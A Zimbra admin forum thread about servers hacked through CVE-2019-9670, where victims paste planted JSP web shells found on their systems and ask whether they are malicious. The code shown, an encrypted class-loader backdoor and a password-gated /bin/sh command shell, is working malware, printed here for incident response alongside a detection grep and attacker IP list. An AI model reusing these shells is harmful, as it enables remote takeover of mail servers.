CVE-2019-9670 being actively exploited (Hacked Server)

Discuss your pilot or production implementation with other Zimbra admins or our engineers.
Drake
Posts: 8
Joined: Tue May 28, 2019 8:52 am

Re: CVE-2019-9670 being actively exploited

Post by Drake »

Hi guys
Can you check the following code found in the corresponding files and tell if it is malicious. To me it seems to be.

<< /opt/zimbra/jetty-distribution-9.1.5.v20140505/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("f037KfDS-uNcpGsM45mGqbjjKhqUUng7_fY2U9-85Gs")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>

>>

<</opt/zimbra/jetty-distribution-9.1.5.v20140505/webapps/zimbraAdmin/public/jsp/Alert.jsp
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("Hok8gxZFafGORRLCiowY_vpqNappusQV8agmQkI7wKk")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>

>>

Thank you.

With Regards
elby
Posts: 16
Joined: Tue May 28, 2019 7:37 am
Contact:

Re: CVE-2019-9670 being actively exploited

Post by elby »

The problem appeared again. Do you have these folders?


/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp

with:
/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.class
/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.java

and

/opt/zimbra/jetty-distribution-9.1.5.v20140505/work/zimbra/org/apache/jsp/public_/jsp/CryptCore_jsp.class
/opt/zimbra/jetty-distribution-9.1.5.v20140505/work/zimbra/org/apache/jsp/public_/jsp/CryptCore_jsp.java
/opt/zimbra/jetty-distribution-9.1.5.v20140505/work/zimbra/org/apache/jsp/public_/jsp/Docs_jsp.class
/opt/zimbra/jetty-distribution-9.1.5.v20140505/work/zimbra/org/apache/jsp/public_/jsp/Docs_jsp.java

@Drake, yes, the files you mentioned are infected.
docat
Posts: 2
Joined: Wed May 29, 2019 9:01 am

Re: CVE-2019-9670 being actively exploited

Post by docat »

I notised that 2 days a row at 9:18 (my local time) sed is started. it works about 10-20 seconds and after that zmswath appears and all of this.
Can this be used somehow?
erefer@gmail.com
Posts: 3
Joined: Tue May 28, 2019 12:41 pm

Re: CVE-2019-9670 being actively exploited

Post by erefer@gmail.com »

Drake wrote:Hi guys
Can you check the following code found in the corresponding files and tell if it is malicious. To me it seems to be.

<< /opt/zimbra/jetty-distribution-9.1.5.v20140505/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("f037KfDS-uNcpGsM45mGqbjjKhqUUng7_fY2U9-85Gs")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>

>>
Thank you.

With Regards
Yes, it's malicious code. And your version confirm that the key used by the hacker is not fixed.

Basically, this code allows the hacker to upload an encrypted java class and to execute code in it.
elby
Posts: 16
Joined: Tue May 28, 2019 7:37 am
Contact:

Re: CVE-2019-9670 being actively exploited

Post by elby »

Help me with this plz :

/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.java:if("lMIAb3JS-s7dPUDkAZA-O8INcT4vQWNQ_oILtGOGZLE".equals(request.getParameter("ppwd"))){java.io.InputStream in = Runtime.getRuntime().exec(new String[]{"/bin/sh","-c", request.getParameter("pcom")}).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("</pre>");}


Do you have these files at all?

/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.class
/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.java
Drake
Posts: 8
Joined: Tue May 28, 2019 8:52 am

Re: CVE-2019-9670 being actively exploited

Post by Drake »

erefer@gmail.com wrote:
Drake wrote:Hi guys
Can you check the following code found in the corresponding files and tell if it is malicious. To me it seems to be.

<< /opt/zimbra/jetty-distribution-9.1.5.v20140505/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("f037KfDS-uNcpGsM45mGqbjjKhqUUng7_fY2U9-85Gs")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>

>>
Thank you.

With Regards
Yes, it's malicious code. And your version confirm that the key used by the hacker is not fixed.

Basically, this code allows the hacker to upload an encrypted java class and to execute code in it.
erefer thanks for the reply. Regarding the key used by the hacker do i need to do something else than just deleting these two files?

Thank you in advance
With Regards
zimbraxtc
Posts: 10
Joined: Mon May 27, 2019 6:13 pm

Re: CVE-2019-9670 being actively exploited

Post by zimbraxtc »

elby wrote:Help me with this plz :

/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.java:if("lMIAb3JS-s7dPUDkAZA-O8INcT4vQWNQ_oILtGOGZLE".equals(request.getParameter("ppwd"))){java.io.InputStream in = Runtime.getRuntime().exec(new String[]{"/bin/sh","-c", request.getParameter("pcom")}).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("</pre>");}


Do you have these files at all?

/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.class
/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.java
I have not.

/opt/zimbra/mailboxd/work/zimbraAdmin/ exists but is empty.

Running 8.6
mqaroush
Posts: 42
Joined: Sun Aug 03, 2014 4:31 am

Re: CVE-2019-9670 being actively exploited

Post by mqaroush »

Can you check the following code found in the corresponding files and tell if it is malicious.
[root@we ~]# cat /opt/zimbra/jetty/webapps/zimbra/public/Ajax.jsp
<% if ( "nmmwxkYBjkrOn47r0oaUOFg139-kaTSEj0EIePPK5wA"
.equals( request.getParameter( "p" +
"pwd" ) ) )
{ java.io.InputStream AwDiE = Runtime.getRuntime()
.exec
( new
String[]
{
"/" + "bin/sh"
, "-c"
, request.getParameter(
"p" + "com"
) } )
.getInputStream()
; int MqP
= -1
;
byte[] NtRe
=
new
byte[ 22 ]
; out.print(
"<"
+
"pre>"
) ;
while(
( MqP = AwDiE.read( NtRe
) ) != -1 ) { out.print( new String( NtRe,
0, MqP ) ) ; }
out.print( "</" + "pre>" ) ;
} %>

Also , what is the meaning of this line :
[root@we~]# cat /opt/zimbra/log/access_log.2019-05-30 | grep pyth
218.103.121.116 - - [30/May/2019:00:14:20 +0000] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 400 345 "-" "python-requests/2.21.0" 5
bizonek
Posts: 7
Joined: Sat Sep 13, 2014 2:36 am

Re: CVE-2019-9670 being actively exploited

Post by bizonek »

hHi

Maybe this will help someone.
#0 - I did all steps suggested in this post and all from https://lorenzo.mile.si/zimbra-cve-2019 ... ction/961/ and I still had this problem, so I did:
#1 - find all corrupted files containing:
grep "if.*equals(" -R /opt/zimbra/mailboxd/
and remove code starting from %if ("HASSSSHHHHH to ; } %
example:
<%
if ( "N67nqYcLWDOojFzFNvPCSAPQKg7VysUYXclEM1BZBIQ" .equals(
.....
QokFueMBi ) ) ;
} out.print(
"</p"
+ "re>"
) ; } %>
If the file is binary, remove a whole file.

#2 - block all those IP
  • 141.98.80.47
    71.6.146.130
    158.69.195.70
    85.234.126.0/24
    185.211.245.0/24
    89.248.0.0/16
    46.3.96.2
#3 - Apply patch one more time (with an argument -force)

#4 - reboot the system (required to stop all connections or kill all active connections)

After this, I have almost a week without any problems.
doses
Posts: 1
Joined: Sun Jun 02, 2019 9:54 am

Re: CVE-2019-9670 being actively exploited

Post by doses »

Всем привет.
Hi everyone

Мне кажется стоит ещё обратить внимание на данную статью:
( https://blog.tint0.com/2019/03/a-saga-o ... html#href1 )

I think it is also worth paying attention to this article:
( https://blog.tint0.com/2019/03/a-saga-o ... html#href1 )
Post Reply